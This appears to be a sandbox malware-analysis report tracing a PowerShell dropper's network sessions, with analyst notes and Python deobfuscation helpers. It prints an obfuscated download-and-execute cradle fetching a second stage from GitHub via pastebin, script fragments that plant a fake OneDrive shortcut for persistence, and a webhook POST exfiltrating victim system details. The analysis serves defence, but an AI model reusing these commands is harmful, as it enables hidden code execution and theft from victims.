                                                                                                2024-10-15 13:54:51 UTC212OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 68 61 72 64 7a 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 67 74 61 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 5f 44 45 45 43 5a 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
Data Ascii: {
    "content":  "**user** has joined - gta\n----------------------------------\n**GPU:** _DEECZG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"
}
                                                                                                2024-10-15 13:54:51 UTC1269INHTTP/1.1 404 Not Found
                                                                                                Date: Tue, 15 Oct 2024 13:54:51 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 45
                                                                                                Connection: close
                                                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000492
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F69Dnzw0wq7RtVEVpxbkNq5hZzTXGWno7esEgWayh6fA9Pyjs1jcnbLrvJVolv96jC%2FyNTHFmtbAl%2FDU9AmsmkW%2BrbKA%2F1Lzf%2B4Vf8kAAPAO%2BV%2Br5BSN3%2BBk7Bo%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Set-Cookie: __cfruid=69022a55f2b8783d0d63679e0838c8b202ffbc2e-1729000491; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: _cfuvid=WlDXhfnKcSPqw_2Ei8YQ4SyVmTX.S.GQxnEfCc7UuGo-1729000491258-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304dadbbc04692-DFW
                                                                                                2024-10-15 13:54:51 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.3 | 62864 | 104.20.3.235 | 443 | 4116 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-15 13:54:55 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:54:56 UTC397INHTTP/1.1 200 OK
                                                                                                Date: Tue, 15 Oct 2024 13:54:56 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 146
                                                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304dcc5fbe2cb4-DFW
                                                                                                2024-10-15 13:54:56 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85
calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                                2024-10-15 13:54:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0
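The pastebin response in this session (served again, unchanged, in session 5) is a one-line PowerShell download cradle with two layers of obfuscation: the cmdlet names are custom aliases, and the second-stage URL is split into concatenated string literals. The alias setup is visible in the UTF-16 decimal dump of gaber.txt in session 4 below (`...allit iEx; sal $env:os iWr; calliT(WINDOWS_NT ...`): Set-Alias binds `calliT` to `iex` and an alias named after the value of `$env:OS` to `iwr`, so `calliT(WINDOWS_NT ...)` is `Invoke-Expression (Invoke-WebRequest ...)`. The following Python is an added analyst example, not part of the Joe Sandbox report and not code from the sample; it folds the concatenation, learns the aliases from the `sal` statements and rewrites the cradle in canonical form. It assumes `$env:OS` is `Windows_NT`, and the built-in alias table it carries (`iex`, `iwr`, `irm`, `curl`, `wget`) is the one PowerShell 5.1 ships with.

```python
import re

# Built-in PowerShell 5.1 aliases that download cradles lean on.
BUILTIN_ALIASES = {
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod",
    "curl": "Invoke-WebRequest",
    "wget": "Invoke-WebRequest",
}

# Alias setup as recovered from the LNK argument string in gaber.txt (session 4 dump).
# Assumption: $env:OS is Windows_NT, which is what the alias name WINDOWS_NT relies on.
ALIAS_SETUP = "sal calliT iEx; sal $env:os iWr"
ENV = {"OS": "Windows_NT"}

# The one-liner returned by pastebin.com/raw/sA04Mwk2, copied from the report.
STAGER = ('calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"'
          '+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)')

# ("a"+"b"+"c") -> "abc": only literal-to-literal concatenation inside parentheses is folded.
CONCAT_RE = re.compile(r'\(\s*"[^"]*"(?:\s*\+\s*"[^"]*")+\s*\)')
STRING_RE = re.compile(r'"([^"]*)"')
IDENT_RE = re.compile(r'[A-Za-z_][A-Za-z0-9_]*')


def fold_concats(ps: str) -> str:
    """Join each run of concatenated string literals into a single literal."""
    return CONCAT_RE.sub(lambda m: '"' + "".join(STRING_RE.findall(m.group(0))) + '"', ps)


def learn_aliases(setup: str, env: dict) -> dict:
    """Map lower-cased alias names to canonical cmdlets from `sal NAME TARGET` statements.
    The alias name itself may come from an environment variable ($env:os -> Windows_NT)."""
    aliases = {}
    for stmt in setup.split(";"):
        parts = stmt.split()
        if len(parts) == 3 and parts[0].lower() in ("sal", "set-alias", "nal", "new-alias"):
            name, target = parts[1], parts[2]
            if name.lower().startswith("$env:"):
                name = env.get(name[5:].upper(), name)
            aliases[name.lower()] = BUILTIN_ALIASES.get(target.lower(), target)
    return aliases


def deobfuscate(stager: str, aliases: dict) -> str:
    """Fold string concatenation, then rewrite alias tokens that sit outside string literals.
    PowerShell command lookup is case-insensitive, so the lookup key is lower-cased."""
    table = {**BUILTIN_ALIASES, **aliases}
    segments = fold_concats(stager).split('"')
    for i in range(0, len(segments), 2):          # even segments are outside quotes
        segments[i] = IDENT_RE.sub(lambda m: table.get(m.group(0).lower(), m.group(0)),
                                   segments[i])
    return '"'.join(segments)


def extract_urls(ps: str) -> list:
    """Host/path literals that appear once concatenation is folded (the next-stage location)."""
    return re.findall(r'"((?:https?://)?[A-Za-z0-9.-]+\.[A-Za-z]{2,}/[^"]*)"', fold_concats(ps))


if __name__ == "__main__":
    found = learn_aliases(ALIAS_SETUP, ENV)
    print(found)
    print(deobfuscate(STAGER, found))
    print(extract_urls(STAGER))
```

The folded URL matches the path requested in session 4, which is the check that the two layers were undone correctly; the same approach applies to any cradle that hides `iex`/`iwr` behind `sal`, as long as the alias-setup line is recovered from wherever the dropper stores it (here, the LNK arguments).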


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.3 | 62866 | 185.199.110.133 | 443 | 4116 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-15 13:54:57 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:54:57 UTC902INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 7508
                                                                                                Cache-Control: max-age=300
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:54:57 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdfw8210074-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 1
                                                                                                X-Timer: S1729000498.930482,VS0,VE1
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: ad08c80caa3dcb5728cc61fb15b0ffd836f95083
                                                                                                Expires: Tue, 15 Oct 2024 13:59:57 GMT
                                                                                                Source-Age: 145
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
Data Ascii: sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                                2024-10-15 13:54:57 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                                2024-10-15 13:54:57 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
Data Ascii: ======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W
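gaber.txt is a PowerShell script that deletes and recreates `C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk`, and the long decimal array in the middle of it is the shortcut file itself as a PowerShell byte array: the UTF-16 strings `forfiles.exe`, the alias setup `sal $env:os iWr; calliT(WINDOWS_NT ...` and the `1SPS` property-store signature are all readable in the dump. The Python below is an added analyst example, not part of the report or of the sample; it decodes the report's own dump formats so the artefacts can be examined offline: Data Raw hex back to text (with the 0a line breaks preserved, independently of how the Data Ascii column renders them), the decimal array back to bytes, and printable UTF-16LE runs pulled out of those bytes together with any `sal` statements they contain. The sample inputs are the opening bytes of the first gaber.txt chunk and two fragments of the decimal array, copied from this session.

```python
import re


def decode_hex_dump(line: str) -> str:
    """Decode a report 'Data Raw: 73 6c ...' line to text.
    Line-break bytes (0a / 0d 0a) are kept, so multi-line scripts come back with their lines."""
    hexpart = line.split("Data Raw:", 1)[-1]
    return bytes.fromhex("".join(hexpart.split())).decode("latin-1")


def decode_decimal_array(text: str) -> bytes:
    """gaber.txt embeds the LNK file as a PowerShell byte array ('...,0,102,0,111,...')."""
    return bytes(int(n) for n in re.findall(r"\d+", text))


def utf16le_strings(data: bytes, min_chars: int = 5) -> list:
    """Printable UTF-16LE runs: LNK path, argument and property-store strings look like this."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars)
    return [m.group(0).decode("utf-16-le") for m in pattern.finditer(data)]


def alias_statements(command_line: str) -> list:
    """(name, target) pairs for every `sal NAME TARGET` in a recovered command line."""
    return re.findall(r"\b(?:sal|set-alias)\s+([^\s;]+)\s+([^\s;]+)",
                      command_line, flags=re.IGNORECASE)


# Copied from the report: opening bytes of the first gaber.txt data chunk (session 4).
HEX_LINE = ("Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 "
            "5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c "
            "42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a")

# Copied from the report: two fragments of the decimal byte array (the embedded LNK).
LNK_FRAGMENT_A = ("132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,"
                  "101,0,120,0,101,0,0,0,28,0,0,0")
LNK_FRAGMENT_B = ("0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,"
                  "101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,"
                  "105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112")


if __name__ == "__main__":
    print(decode_hex_dump(HEX_LINE))
    for fragment in (LNK_FRAGMENT_A, LNK_FRAGMENT_B):
        for s in utf16le_strings(decode_decimal_array(fragment)):
            print(repr(s), alias_statements(s))
```

Applied to the full array (not reproduced here), the same two functions yield the complete LNK argument string, which is where the aliases used by the pastebin stager are defined; the fragments above are cut at chunk boundaries, so the first `sal` only survives as `...allit iEx`.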


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.3 | 62868 | 104.20.3.235 | 443 | 7688 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-15 13:55:03 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:55:03 UTC397INHTTP/1.1 200 OK
                                                                                                Date: Tue, 15 Oct 2024 13:55:03 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 153
                                                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304df98ae32e17-DFW
2024-10-15 13:55:03 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85
calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 13:55:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.3 | 62870 | 185.199.110.133 | 443 | 7688 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:55:04 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
2024-10-15 13:55:05 UTC | 902 | IN | HTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 7508
                                                                                                Cache-Control: max-age=300
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:55:05 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120125-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 1
                                                                                                X-Timer: S1729000505.278943,VS0,VE1
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: 367c21d51ac736814380477f6398ee9134968b44
                                                                                                Expires: Tue, 15 Oct 2024 14:00:05 GMT
                                                                                                Source-Age: 152
2024-10-15 13:55:05 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
Data Ascii:
sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
